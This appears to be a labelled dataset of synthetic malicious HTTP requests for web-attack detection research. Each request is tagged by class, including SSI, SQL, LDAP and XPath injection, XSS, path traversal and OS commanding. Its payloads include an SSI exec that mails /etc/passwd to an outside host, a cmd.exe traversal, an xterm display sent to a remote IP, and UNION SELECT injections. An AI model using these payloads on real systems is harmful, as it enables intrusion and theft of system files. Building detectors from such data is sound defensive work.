Authorization: NTLM Zml4aXJvaEdldHdzb2J0YWRhb2x0bG1ham90cm5lbmhlaXNsb2U0bmxuYw==
Referer: /he7p5c/an2enEie.php4
TE: trailers,trailers
User-Agent: gId2PLk http://www.0enoraa.net
Via: 1.9 www.AtleMglf.css:744, phzic/0.0 120.156.53.132, 0.3 www.ehRo.html
Transfer-Encoding: identity

ltihriheiV2DeeK=aErrev&eytkpptTpl=916&uoafHr=pO&vfqshmoetu=s&5i9|ustmpbol&otooaen4=42&tlAoausmtewrw6e=1094&nantmrIfsqpmstc=5&ren7etb=e@fmTIzg9c&ANwdi0=73&EoFuQzup=mDWzCQMZDibs&pt3flaephl9i=va&dsagitaa4a=7&ett9rJvnh=../../../../../../proc/version

End - Id: 46075
Start - Id: 40121
class: SSI
GET /eKcZLaSsLFPe/mSQ_yMNulG0DWwinntusr/qZ2OjTMlDvL8tj/DoptRpysock_stream/8_/7eebee7najR/R0ima4ehnihe/npj3eiaji0/apvEVS.1.css?LDgscmde.Dlogf.6=drqfiiiezg3es&o5nl=%3C%21--+++++%23exec+++cmd%3D%22%2Fbin%2Fmail+++++rdO8iow.com++++%3C+%2Fetc%2Fpasswd%22--%3E&wsnyfd=81342&HQwindow.openlocationAqcwk%u=nnteEoa&ml8o=368526 HTTP/1.1
Host: www.Hnmtdm.de
Connection: acczn
Accept: application/*, application/postscript
Accept-Charset: x-mac-ce, x-mac-hebrew;q=0.7, isiri-3342;q=0.5
Accept-Encoding: identity, deflate, compress, gzip;q=0.0, identity;q=0.0
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 233.132.159.137
Cookie: neuMdlyvlwnI=1stasH8seg/3setsdo;e3iup=lW.P;reuo5littjr0=fnlhewmh
Cookie2: $Version="3"
Date: Wed, 31 Aug 05 20:27:09 CET
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Fri, 01 Feb 08 04:55:25 CET
If-Unmodified-Since: Sun, 27 Mar 05 04:20:16 UTC
If-Match: "evoRPiZxEK_61Fssz3"
If-None-Match: "E9KpFInStExR8VetqN"
If-Range: Thu, 13 Oct 05 07:24:31 GMT
Max-Forwards: 98
MIME-Version: 9.5
Pragma: q='fnr'
Proxy-Authorization: Basic d2VuYTE1aWE6c3lhYzY=
Authorization: nrhrn glnNrs=uTci
Range: 01784-577,9-7,8678-
Referer: /3ch1n.swf
TE: chunked,chunked;q=0.6,gzip;q=0.1
Trailer: Proxy-Authorization
User-Agent: uenlrjmxt/5.2.3.6
UA-CPU: Sparc
UA-Disp: 8182,5910,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 768x931
Via: FTP/7.1 www.iaaitnwc.gif:19845, 2.6 131.29.96.60
Transfer-Encoding: compress
Upgrade: cCeeG/6.9, rnime/3.6
Warning: 530 www.keiqse.jpeg "tjsEot3eeoicdet6rlc" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 42315795
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40121
Start - Id: 37106
class: LdapInjection
GET /2rhwMsyailrceoolih/dhJomLrvJ.tiff?won1maotsrpeank=5192532&ohetnohTWeg=%3Biem++0alinky%5Dsock_streamDriml+%5Cs&5TdTntze9plhv7=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&aJhae7aq=t2mo&1ut3teAk=Eriinn7gp2iTt+&ekwnleanz=f&XBVrglsjt=392&eplmfIwnadiA=systemon%25&Tr=oorcp+ofsng HTTP/1.1
Host: 12.38.134.44
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity;q=0.1, identity;q=0.0
Accept-Language: ot-knwM;q=0.3, 4rwdati-efutp, 6je-t1T;q=0.9, oehxtwf-Om, Neeeic-ttnXmxt
Cache-Control: no-transform
Client-ip: 118.166.126.189
Cookie: so=6052119315
Cookie2: $Version="020"
Date: Sat, 08 Nov 08 09:43:47 CET
ETag: "j2eG.GnfHJHjLn4"
Expect: gtPqvlrf=Lwdh
From: ai47ho@TehprawA.gov
If-Modified-Since: Tue, 29 Sep 09 16:12:50 GMT
If-Unmodified-Since: Sun, 17 Oct 04 04:20:18 CET
If-Match: *
If-None-Match: "8BM@y_AICcHs5q@xQG2"
If-Range: Mon, 01 Sep 08 06:22:32 GMT
Max-Forwards: 64
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Basic cmVzZXJxOnJFZXRubg==
Range: 447995-1,-181875,4-55620
Referer: /ao3mhn/tnnsdmsp/trohsi/asqa9/klto7ueh.gif
TE: chunked,gzip;q=0.2
Trailer: Via
User-Agent: masbbdedeUeedmn
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 617x3755
Via: HTTP/3.9 186.137.60.44
Transfer-Encoding: 6mna
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 199 www.elcE7aks.shtml "cetxttaetiha" "Mon, 13 Oct 08 07:41:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37106
Start - Id: 40012
class: SSI
GET /wrIs/strozettNiFe9jsgyep/stibigny0hoEYahnisl7/skWmitHEI9aU3xqvCil/TR735F2w1/XKmvSds@U/Grm@UStxQ_VhjV/th2nt9R1Osh/eWh86CF/fA8p/ehTEMJ3RNFPGlD.nn3J.jpg?flhd9aa=pf5UNhN9IJ9&aadr=aat3wnhusrwmsenC&fdAseaqo=%3C%21--++%23exec+cmd%3D%22%2Fbin%2Fls+++-l+%2Fhome%2Feh%2Fosqsi%22+--%3E&irfcqhh=nllsvcw9bin&ael=%3F&h2=sgrglst6stTfromxet&yDsnnn=aphpnnt%2Ftlxs0uete HTTP/1.1
Host: 220.99.174.159:80
Connection: da2a
Accept: */*
Accept-Charset: euc-jp, iso-10646-ucs-2, macintosh
Accept-Encoding: 
Accept-Language: sd-f;q=0.1, emaso-njeilm4e;q=0.1, n-ouren
Cache-Control: no-store
Client-ip: 133.142.247.233
Cookie: LzGIshutdownr9.P=izUliUqRO;HtdlTedqphsen1=mWawRkCT92pV;ettuf=10;5dtfaik=80
Cookie2: $Version="2"
Date: Sat, 07 Feb 09 07:48:44 GMT
ETag: W/".1jeLkNVQ5pd_jD-7"
Expect: hniFtla
From: l1ahde@nablau.fr
If-Modified-Since: Sun, 18 Apr 10 15:49:59 CET
If-Unmodified-Since: Thu, 31 Dec 09 24:04:13 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Jan 06 18:03:33 GMT
Max-Forwards: 101
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: 6hciaf sdCbsnee=rusoc6
Range: 4761-
Referer: http://www.mdiitsei.net/tymiil/bgsisr/samfi/sTsoww/unttdig.swf
TE: trailers,deflate;q=0.0
Trailer: Host
User-Agent: nNczftLv http://www.n9crleEr.org
UA-CPU: Sparc
UA-Disp: 5489,849,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5394x1347
Via: 2.6 www.nspa.htm:75, HTTP/7.2 www.Hrgghmlm.tiff
Transfer-Encoding: identity
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40012
Start - Id: 36504
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 244.52.14.202:80
Connection: rlhlmp
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 128.26.229.78
Cookie: sraTrqsCeui=5;dli=itsbeannteu29w
Cookie2: $Version="6"
Date: Tue, 28 Aug 07 03:19:47 CET
ETag: "PbL-0SjZXzb3X6N9tt"
Expect: atcEeo
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Mon, 08 Jan 07 06:06:22 GMT
If-Match: *
If-None-Match: "Vn_sx9R.4PJ5Hed"
If-Range: Mon, 26 Jan 04 16:58:28 UTC
Max-Forwards: 9509
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: osnreg sghsw=aqOrAfHc
Range: 560-980083,973913-
Referer: /01eveka/wi2oe.html
TE: trailers,trailers,chunked;q=0.5
Trailer: From
User-Agent: Mozilla/9.8 (compatible; o6tkSeR3d; Linux i586; sossnnssW; utervaata)
UA-CPU: MIPS
UA-Disp: 0316,285,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9877x8489
Via: 2.0 55.42.209.45, 1.6 239.46.52.144:8062, 9sh6/4.8 168.212.48.183:524
Transfer-Encoding: gzip
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36504
Start - Id: 47650
class: XSS
GET /eXr@@AwEEMv/lsReeotuf/dtholvdascElm/seeaO7icjet/kre0unecSalahfutl/ao/Sne.asmx?1gKhees=1731611331&i8AesBh=%3Cdiv+++++style++++%3D+%22+++++behaviour%3A++url%28%5Bhttp%3A%2F%2Fwww.arra.com%2Fscript%2FotAon27he.php3%5D%29%3B++++%22+++%3E&buIDN48K=3976523164&eDhonA3=hX735&sI0a7=9&sidnaapri3ecn=lcr&gtEberanl=8866919&aynoodei4t=replacev&eeialm=e2HMrLwOpm&yiodp=058649&iqnb7etletlntna=s%24scncpylis+a HTTP/1.0
Host: 64.97.181.84:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: ee7tpb0r='eHw'
Client-ip: 168.210.69.11
Cookie: pet=97458329;vsna3ou=uMOf;3nhdmw=Pi
Cookie2: $Version="8"
Date: Tue, 10 Feb 04 09:01:32 GMT
ETag: W/"HdQF3OlRjugb5Pl2R"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Mon, 15 Aug 05 17:20:20 GMT
If-Match: *
If-None-Match: "z8QelD6NP_QeLmI1FJGP"
If-Range: *
Max-Forwards: 332
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cm84aWJnZW9sbXNzbnR3ZWxueGE0c2V2cnd0bjV0dTJtbnE=
Range: 51-,059585-
Referer: http://www.ePag6aih.ch/eo6hirl/ebaalhna/84oj.rar
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: Via
User-Agent: ecMO6_Ll http://www.dnaeemfb.org
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: FTP/4.7 www.otsd6.shtml, 6.5 www.0ajg.jpg, 0.9 206.142.107.158
Transfer-Encoding: gzip
Upgrade: lica5r/6.9
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47650
Start - Id: 41414
class: SqlInjection
PUT /rSIG7G/sea/iIm52GxfMhnCsoRpgew/hfksnnh@h0TtJ.y/qOdC_-GOQq861N3.msf? HTTP/1.0
Content-Length: 209
Content-Language: r,dwb
Content-Encoding: compress
Content-Location: http://tceIpN8o.fr/fd0ds/lamdNi/axcaDs9.swf
Content-MD5: ZmVrc2Nvc3VvaXkxdG9ibg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Apr 07 15:20:43 UTC
Last-Modified: Sun, 26 Aug 07 10:15:41 UTC
Host: 222.148.107.149:31007
Connection: eah5oecl
Accept: */*
Accept-Charset: x-mac-korean;q=0.8, cp-932;q=0.2
Accept-Encoding: 
Accept-Language: n-is6oia, gr-1ak1rc;q=0.7, saeurm2-Es5;q=0.6, mTckiHS-ntuil, o-oocIn;q=0.2
Cache-Control: no-cache
Client-ip: 180.8.150.200
Cookie: rm9djuteoeatt=nAnr3xc;iih65rwyttTy=7ttrr|;ewgr=79873673;utmoimixr6dC6ts=r 3x;gtrSlyg=axvJH;idEa7Ia5dsaek=1830638
Cookie2: $Version="59"
Date: Sun, 02 May 04 03:47:52 UTC
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: oghl
From: cTensp@smyerSeiti.st
If-Modified-Since: Wed, 12 Nov 08 18:53:54 GMT
If-Unmodified-Since: Wed, 26 Apr 06 12:17:41 CET
If-Match: "d-pyYyZhtOUr6rzkfU9G"
If-None-Match: *
If-Range: Tue, 08 Sep 09 05:55:04 GMT
Max-Forwards: 12
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Basic ZWgybWxvUDoxb3ljb3RsZA==
Range: 24-
Referer: /Ei18psb/eior/nhXtawn/rwootfte.fgf
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: pREMB9 http://www.imxh.de
UA-CPU: MIPS
UA-Disp: 0223,7526,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1178x5140
Via: 1.4 www.thuScr.css:9, 9.7 0.189.119.128
Transfer-Encoding: gzip
Upgrade: Isn/9.3, htaAUm/9.1, 8ld2/5.0, aycrf/8.9
Warning: 632 www.ittuqan.jpeg "eesSloe6b" "Mon, 16 Aug 04 21:53:38 UTC"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 19164
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

access_logKv42uNKw9S=hDX&iAkeo=')   UN/**/ION ALL    SEL/**/ECT 'irqeua',72873,83,'Sxf',9     FROM Ocs  WHERE    (    ''='&os=ptxiaksamyc>Aden<ledt&eayuoenhIEi=ovorJOV

End - Id: 41414
Start - Id: 37139
class: LdapInjection
GET /fjqMQbDss2AJWHGFL8L/-noDprocessing-instructionn/soTiofMrhdAimcdas/theEetshsrtnebatiijs/tCtlV_g.5Fm3X/sS/lE5K-73zPXR/jfex6ibT/eTVNHinH2-0DL1l/6y.X.asp?eaHitel7m=otstreu&maehd1thPlmh=%29++%28++++%7C+++%28displayName%3Dhad*%29%28name++%3D+had*+++%29%28+++mail%3Dhad*++%29 HTTP/1.1
Host: www.k7ax.ch:72
Connection: 5nn0e8f
Accept: video/*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.8, deflate, deflate;q=0.1, identity, gzip;q=0.8
Accept-Language: yaazw-h, t-oh1
Cache-Control: only-if-cached
Client-ip: 186.207.13.158
Cookie: bQpositionnM.=iyfK;eiohboeceoo3=00177;DosoAnt2=heo1;copydivVu7DKpeU=42370082
Cookie2: $Version="92"
Date: Fri, 15 May 09 21:04:51 GMT
ETag: "Rits1UwssAAAZBA"
Expect: dlmehE
From: ke6iat@otEmem.org
If-Modified-Since: Mon, 21 Feb 05 05:35:05 GMT
If-Unmodified-Since: Mon, 08 Sep 08 08:06:44 UTC
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: "9sZm3-xP@SjbYoETlP"
If-Range: Mon, 29 Oct 07 13:02:16 CET
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM ZW9hMGJpZHJibW9weGxzbmU0d1JlZnkwcmNsbG50dXJuMnRzbQ==
Authorization: NTLM aGNlbmtpYXhhaHV3UnNhdHJlaW8xNGVib21yQXRlcjlvZG8yb2tjaQ==
Range: 1-,52545-
Referer: /0wh7eywe/rrtehal.mpeg
TE: chunked,deflate;q=0.5,gzip;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 2.8; oa-ai; rv:6.3.9) Gecko/70502704
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: mfev/5.4 149.33.162.221:7
Transfer-Encoding: hESe
Upgrade: lunch/5.6, pdEss0/7.0, krsnd/5.3, eeh7tt/5.5, oqeat/4.8
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 84.40.27.181
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37139
Start - Id: 39492
class: SSI
POST /aY/wH@1yER.kU.VuBfnmd-/VS/cyeprllifaeettn/jie7b9tesOwbom4pciz/19@YG8ko/7xKmwS.udkNeOoS.cgi? HTTP/1.1
Content-Length: 303
Content-Language: nrefv,auce
Content-Encoding: compress
Content-Location: /xerRk.swf
Content-MD5: cjZvZWhzbGw0aXlzZXIxYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 Dec 09 02:09:31 CET
Host: 50.60.48.100:147
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 156.55.147.82
Cookie: dpEdslcIegpT=Resmochaal;lnhBinscai=<!--#echo var="date_gmt"-->;es=7075866
Cookie2: $Version="20"
Date: Wed, 19 Dec 07 10:43:10 UTC
Expect: zmhaZbmt
If-Modified-Since: Fri, 09 Oct 09 11:45:20 GMT
If-Unmodified-Since: Tue, 09 Oct 07 12:38:59 UTC
If-Match: "t_jh53fYSDqnLLsx4"
If-None-Match: *
If-Range: Fri, 19 Mar 10 22:55:09 CET
Max-Forwards: 0
Pragma: no-cache
Referer: http://www.tayhre.net/a8atniau/booyLiw/boo9/ad3x/PiTIsqdo.avi
User-Agent: e3eowhe/9.1.6.8
UA-Pixels: 4899x9428
Via: ET1ow/1.3 www.qqotTfm.gif, 1.9 50.28.85.155
X-Forwarded-For: 114.204.134.63
----: -----------------------------

DoSA2-aL1=19&j0hesdurs=vKBjTKzvw.Kb&9is=nrdwetoenot &nuhmi2qadHi=fe-gyM5vA&ts5=d7X8ag&sheszb=)apinputs$updatezedd1euNo&e8=gt&SE6mailZ96gfa=t5e$&@iframevarz5R8NT=mKbjb&9-MffobjectxN=cN&nftowoiEenlenp=boot.iniau&Enhzwe=yhomen&louwgggottea=rb2ohformote)l&P26d7m5=\] 5Koprocessing-instruction Bs

End - Id: 39492
Start - Id: 36301
class: PathTransversal
GET /36ueAi/em2ur/aS5/treehamo/dmBgP08RaZmd/V1KAbFvaBzEX./u-2FogjWrW-TE04OFE/wnmkadunaeoshera/2N63rLZbXfk2O1KeRD/-execO-tJD/rOZf0RE.gif?vgo2siti0=ehiiA5&eozii=57936&kovail=80&95irtefzMiwneta=627&a6stgse=1clrToirt0e1cpeezo&Uh4hptelnetjoS=sL5JG&ceTret=0%3A%2F.htaccess%7E&ortadroesri=mtjcECakZAI&tveuhmbuointin=%26egv8nx0nOxml&5eiuo=ln7sci&acaheeuVeeslks=metaetc+s%3Ai&aROy=sAIjFvZ3aE HTTP/1.0
Host: 161.122.147.204
Connection: rts7snai
Accept: audio/*;q=0.0, audio/x-wav;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: ekn-e9nri;q=0.8, d-tq
Cache-Control: only-if-cached
Client-ip: 173.42.72.46
Cookie: iuaxssdAe=dropetEa2updatewber4s6;secm=299858644;rr7idu=v2V.T;euupytinnzvecr=nl6ttrenPnjasq6;baoaeed=wbC
Cookie2: $Version="878"
Date: Fri, 24 Nov 06 18:19:23 CET
ETag: W/"_CMpMj-5Yq9_H_Af87"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Fri, 30 Oct 09 11:07:23 GMT
If-Unmodified-Since: Tue, 15 Apr 08 01:22:10 UTC
If-Match: "pV61aumhgieINFT"
If-None-Match: *
If-Range: Tue, 15 Dec 09 10:21:51 UTC
Max-Forwards: 1
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: Digest realm
Range: 9-463
Referer: http://www.7rChsfem.fr/Nowl2iw2/gA44peah.pdf
TE: deflate;q=0.8,deflate,gzip
Trailer: Accept-Encoding
User-Agent: yswd/4.4
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 7.8 140.247.82.156:56420
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 777 www.eraf47ht.html "lzrhseSsp9edvonjaeyx" "Fri, 05 Jun 09 03:03:54 UTC"
X-Forwarded-For: 142.213.134.120
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36301
Start - Id: 49753
class: XPathInjection
GET /1twuacee/0hMkt-qXUVRgf/afypnedhno6ahe/3y-connectptFJiE2AC/tdeedn2ner/3vg/sstbfc.swf?.mochah7=3937&tngttuTiccaac6=20++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++72947%3D&Useiep=aVc.Vq06BQ&szlzsrbYtttAiNf=ktdali&smtitz=qoSlaaa HTTP/1.0
Host: www.es4hadieo.be
Connection: close
Accept: text/*;q=0.8, application/rtf;q=0.5, image/gif
Accept-Charset: euc-tw, koi8-r;q=0.7, iso-2022-jp;q=0.5, utf-8, iso-8859-8-i;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=3
Client-ip: 187.113.146.146
Cookie: Qs-.S_=ruqIssj ;lup8i=8;t-NmochabinkX7=su0;3lythbs8n=325
Cookie2: $Version="0"
Date: Sun, 10 Jan 10 22:08:56 CET
ETag: W/"C6vM2QmYRX16nGaa"
Expect: t8nua
From: tyese@ksT0ri.gov
If-Modified-Since: Wed, 09 Aug 06 21:32:23 GMT
If-Unmodified-Since: Fri, 03 Dec 04 15:36:52 UTC
If-Match: *
If-None-Match: "yRTqUh.zN_gEXj28llO5"
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 7
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: aaoe afoasci=wwir
Authorization: tyoeey anees=satta
Range: -1702
Referer: /hu1es/e1qtUt/epoSea.tiff
TE: trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: irRi4t0nHsnFhedts2g
UA-CPU: x86
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3095x7377
Via: 3.6 124.173.151.89, 9.8 246.106.168.180
Transfer-Encoding: deflate
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 781 www.hoetei.html "9scprerIsitC95r" "Thu, 17 Feb 05 10:38:24 GMT"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49753
Start - Id: 38786
class: LdapInjection
GET /mk.s/cek/rhbeiaiws9tD0oOclt/xnon4aN/u5snOZx8er6sote.tiff?2lwe=046%29%28%26%28objectClass%3Dness%29%28%7C%28sn++%3D+++xos%29%28cn%3Drm++J*%29%29&pdtC=hq HTTP/1.1
Host: 126.176.201.77
Connection: close
Accept: */*
Accept-Charset: windows-1253;q=0.4, x-mac-japanese;q=0.3, euc-cn
Accept-Encoding: identity;q=0.6, deflate;q=0.1
Accept-Language: To-trhfto;q=0.8
Cache-Control: only-if-cached
Client-ip: 103.114.5.31
Cookie: ra5eethod1nw=lBa;Nor-giUgR@autoexec=81080648;Iuis3=dSyKw@Ss88z;Oa6aioi=92;ovEmaMsrtdihcep=ryI
Cookie2: $Version="919"
Date: Mon, 12 May 08 24:19:42 GMT
ETag: "IBtj26H_ux12tRgi"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sun, 20 Jun 04 06:50:01 CET
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: *
If-Range: *
Max-Forwards: 019
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: Basic dGVoYTpxMmNjaA==
Range: 777808-9828,-9730,-076
Referer: http://ecrk2lm.cz/eqoety/ymdx4q/mmmup/ipulb.fgf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/8.4 (compatible; Konqueror/8.3; Unix; cnsesxr)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: 9.2 167.132.152.242, 5.2 www.lsua4m.html, FTP/5.6 1.45.94.78:3
Transfer-Encoding: compress
Upgrade: cjw/0.8, roll/0.1, tytuee/5.7
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38786
Start - Id: 43654
class: OsCommanding
PUT /zdbey/vmetaeagq6DYR/Hwhere.Id/aA6.rkesJ/gferendoah/qCHYxqWm.jpeg? HTTP/1.1
Content-Length: 100
Content-Language: c,h4ten
Content-Encoding: compress
Content-Location: http://www.eLetfres.be/ehue3otc/shrtehze.dll
Content-MD5: OGhydmV0ZXQ3bDJPbW5vYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Apr 06 10:03:15 UTC
Last-Modified: Tue, 14 Oct 08 13:56:08 UTC
Host: 131.59.116.160
Connection: keep-alive
Accept: text/*;q=0.4, audio/*;q=0.3, video/*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.3
Accept-Language: *;q=0.3
Cache-Control: no-transform
Cookie: saadlxerpee=| /usr/openwin/bin/xterm+-display+136.210.85.91:0%00;mon=n61ersLqvriontrs;hnrsrouetgj=%sR%d
Cookie2: $Version="859"
Date: Mon, 06 Sep 04 07:30:01 GMT
ETag: W/"i0nVL0@3zMDh2jZwj"
Expect: 100-continue
If-Modified-Since: Sat, 25 Dec 04 24:18:15 GMT
If-Unmodified-Since: Thu, 21 Apr 05 03:36:56 CET
If-Match: "94uF_vaTCBf-WgPSKJWj"
If-None-Match: "pDZZ8UYVEFnelnwJnC@V"
If-Range: *
Max-Forwards: 478
MIME-Version: 5.7
Pragma: rnrv=ekt
Authorization: Digest cnonce="efes6"
Range: 99-9,-6
Referer: http://www.xrriUidl.gov/i8sodepn.nsf
TE: gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: maocor0fh/2.1
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7737x6163
Transfer-Encoding: deflate
Upgrade: l1yi1/5.9, nlcbsf/2.6, tesil/7.1, asni/9.6
X-Forwarded-For: 42.38.123.60
X-Serial-Number: 763668311762942234

N0lsmid2sa2eot=d_2&haonfuen=4058013&eni4l=efobw&sv=eidn1msmr|asno&ligiesact7i5r=pfZ&sEtehcoitI=Xes

End - Id: 43654
Start - Id: 38711
class: LdapInjection
GET /efUh5/iR77VzZNa1nrFKUkG/Ub.sh?adaOa4e=zroinputad01%2F%3AuTctmpnodelocation&ieheic2uheanaen=%2B%26ahsciEfhexecl9%29ldocument&pVyxmidm4o4=758%29%28%26%28objectClass%3D4m2s%29%28%7C%28sn%3D++a1%29%28cn%3Dcnit+++++J*%29%29&sayt4pywte=relDa%5Dt+dh9&arkaoe6eg1nevp=e3vqNbB47sE HTTP/1.0
Host: 93.186.137.193
Connection: keep-alive
Accept: video/*, image/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: ost-speaiE;q=0.0, bdaom-b5et;q=0.4
Cache-Control: no-cache
Client-ip: 176.79.6.203
Cookie: Ei8othheh3=43528732;lt5fsx8Ebm=whe6janc0tecNroer5;traio8tlae=rbNrawKmchnbbaayu;5drttcbht=42KQ;tnnns=611
Cookie2: $Version="7"
Date: Sat, 16 Jan 10 01:47:22 UTC
ETag: "W_VEAUp25OqZ2HNn5Hk"
Expect: rsracoa
From: ilrb@h5ihiwr.cz
If-Modified-Since: Mon, 19 Mar 07 01:53:34 CET
If-Unmodified-Since: Sat, 18 Feb 06 20:47:00 CET
If-Match: *
If-None-Match: *
If-Range: "NzKnRyRqGVPrFBD@J"
Max-Forwards: 7
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: e7fkmh dlnen=ue3t2
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: http://rmesa.de/Y9bkm7mi/gSxe/nebwlVsE/ooe5Nhcr.msf
TE: trailers
Trailer: If-Range
User-Agent: mtREqalao (uq6cG@eV)
UA-CPU: 68000
UA-Disp: 115,677,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: FTP/7.0 www.zoon.css
Transfer-Encoding: gzip
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 442 77.207.105.249 "n0tcfehentkl" 
